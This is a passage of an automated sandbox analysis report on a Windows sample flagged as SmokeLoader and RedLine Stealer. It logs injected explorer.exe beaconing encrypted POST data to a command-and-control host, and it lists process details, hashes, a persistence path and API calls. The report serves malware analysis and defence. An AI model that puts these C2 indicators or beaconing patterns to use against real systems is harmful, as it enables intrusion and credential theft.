Oct 14, 2024 01:54:18.021929979 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:54:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:54:22.523246050 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pfvfrxtosmhgis.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: nwgrus.ru
Oct 14, 2024 01:54:22.523262978 CEST	162	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 1c ee 8a Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vu:Egp[}PssjNwTX#7$4`[CjpvA3
Oct 14, 2024 01:54:25.117286921 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:54:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50039	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:54:29.629760027 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qrcepyiavbj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: nwgrus.ru
Oct 14, 2024 01:54:29.629771948 CEST	165	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 4b fd 84 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vugKl[xHtTFw$tHkoiI)W>>2,s1%h(
Oct 14, 2024 01:54:31.239456892 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:54:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50040	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:54:35.423472881 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jbughtdilxsi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: nwgrus.ru
Oct 14, 2024 01:54:35.423472881 CEST	122	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 38 ed 96 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vu48S<^L{mp\|8"ar)_X1
Oct 14, 2024 01:54:37.062496901 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:54:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50041	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:54:42.302177906 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://adulmxafuqyrwioa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: nwgrus.ru
Oct 14, 2024 01:54:42.302210093 CEST	311	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 22 bd 93 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuc"[6~SBDMr6L3~lb:>CXSQ$'}6<,~}7%-o/)9QAm]zOQN5B#rRS\!ZfUsj\q
Oct 14, 2024 01:54:43.975779057 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:54:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50042	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:54:48.581429005 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ibqsdsbooxlotmkk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: nwgrus.ru
Oct 14, 2024 01:54:48.581461906 CEST	311	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 2c bc eb Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vu+,c:@y?F&.2y-DwgoFVRx4E}.QAh!d]r&W4<GP4`@L'?`[4ZJ
Oct 14, 2024 01:54:50.179156065 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:54:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50043	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:54:55.413235903 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://firvhcleclspvqf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 332 Host: nwgrus.ru
Oct 14, 2024 01:54:55.413260937 CEST	332	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 42 c8 8b Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vu+BG4gA8B\jL}(}t,/ZS6D~X%CLFFHse63WZq1Im\NP\|^"V/3&
Oct 14, 2024 01:54:56.987704039 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:54:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50044	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:01.435952902 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wastiylaaiv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: nwgrus.ru
Oct 14, 2024 01:55:01.435983896 CEST	285	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 2f b6 8a Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuM/PJK?0Az*G9^Np8Z%R+[KecG6j\|RO&vA-oDH1pQ6sJf'{bjY'.
Oct 14, 2024 01:55:03.107470036 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50045	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:08.440407991 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gmunjwtmmqbkfjxj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 217 Host: nwgrus.ru
Oct 14, 2024 01:55:08.440407991 CEST	217	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 0c b8 87 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuJq\Fd~kUJ)~ln!la?PQ27Oo.NPm]]t?+__;P"'!y"
Oct 14, 2024 01:55:09.949276924 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50046	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:15.616013050 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ekdlxdwusihebwve.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: nwgrus.ru
Oct 14, 2024 01:55:15.616063118 CEST	326	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 06 d4 b6 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuJL1OppO?e;=-\|"JGjFWZijM_zWN!DP6>cZ@*,\60du{?_LX14
Oct 14, 2024 01:55:17.943950891 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50047	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:22.610935926 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ytxsvmhxdoiv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: nwgrus.ru
Oct 14, 2024 01:55:22.610937119 CEST	157	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 76 18 a8 8b Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuvnH1WVbxpE.X",B%ZX9\:
Oct 14, 2024 01:55:24.219738007 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50048	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:28.585405111 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cjgfbmyhhfmho.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 369 Host: nwgrus.ru
Oct 14, 2024 01:55:28.585429907 CEST	369	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 0b d0 9f Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuyp@wn#@Cx:S+[^P2jV1FQnwpE.V&!`_U_CL.jnXj],F<CkTT7t
Oct 14, 2024 01:55:30.260673046 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50049	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:35.118352890 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ewwaevdbcqu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: nwgrus.ru
Oct 14, 2024 01:55:35.118386984 CEST	241	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 32 ff e4 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vu}2~^n9ap;=p)8"1On8&4T#pKQp\|1[InmNk3\ -vuGqHYN)d#Tz
Oct 14, 2024 01:55:37.592566013 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50050	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:42.383274078 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://paccyqypahp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 174 Host: nwgrus.ru
Oct 14, 2024 01:55:42.383285999 CEST	174	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6c 5b c0 9e Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vul[x}z25!y)CD~v>J/ ,x29j7<?s<%AEz
Oct 14, 2024 01:55:44.025274038 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50051	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:48.557193041 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vobnbocmacccbp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: nwgrus.ru
Oct 14, 2024 01:55:48.557193041 CEST	362	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 38 e4 e9 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vu\|8i5[b]q4DIcT6?8FU?e3d>*-gyR,!(s-$kX@:5jwt;M\|]fr69
Oct 14, 2024 01:55:51.157521009 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50052	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:55:55.323379040 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://crbgbhwlxoevenop.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: nwgrus.ru
Oct 14, 2024 01:55:55.323379040 CEST	273	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 3d c7 f2 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuJ=v@Qkrs4H 3_FujCQ">NQNX]\g++: VF,2G4*-RPxE!]2
Oct 14, 2024 01:55:56.957978010 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:55:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50053	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:56:01.911906958 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ghpsevkbljqmyuby.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 263 Host: nwgrus.ru
Oct 14, 2024 01:56:01.911933899 CEST	263	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 52 ca 93 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuQR{0jq;[{C;eyR~Z}Z+1CV]`FP'bcN$U/Vy_P;\9;7zM\|\v?r:o?]}
Oct 14, 2024 01:56:03.562711000 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:56:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Target ID:	0
Start time:	19:51:58
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\1HGXcC63iu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1HGXcC63iu.exe"
Imagebase:	0x400000
File size:	275'456 bytes
MD5 hash:	8320DF18FC9660F3A4DCAA29B3707847
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:52:07
Start date:	13/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	19:52:26
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\scjabht
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\scjabht
Imagebase:	0x400000
File size:	275'456 bytes
MD5 hash:	8320DF18FC9660F3A4DCAA29B3707847
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	28.7%
Signature Coverage:	41.5%
Total number of Nodes:	171
Total number of Limit Nodes:	5

Executed Functions

Function 00417620 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 269
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004176F0
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417709
FindAtomW.KERNEL32(00000000), ref: 00417710
GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417718
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00417730
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417757
MoveFileW.KERNEL32(00000000,00000000), ref: 0041775F
GetVersionExW.KERNEL32(?), ref: 0041776C
DisconnectNamedPipe.KERNEL32(?), ref: 0041777F
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004177C4
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004177D3
LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004177E9
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004177FB
PulseEvent.KERNEL32(00000000), ref: 0041780B
SetCommState.KERNELBASE(00000000,00000000), ref: 00417834
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417861
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417872
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041787A
LoadLibraryA.KERNELBASE(004193F8), ref: 00417912

Strings

k`, xrefs: 00417943
}$, xrefs: 00417967

Memory Dump Source

Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd

Similarity

API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
String ID: k`$}$
API String ID: 2183200751-956986773
Opcode ID: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
Instruction ID: ac660437b8637ef0f9ec563d52a15bda1912d96670292318996d42c4d9e3d472
Opcode Fuzzy Hash: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
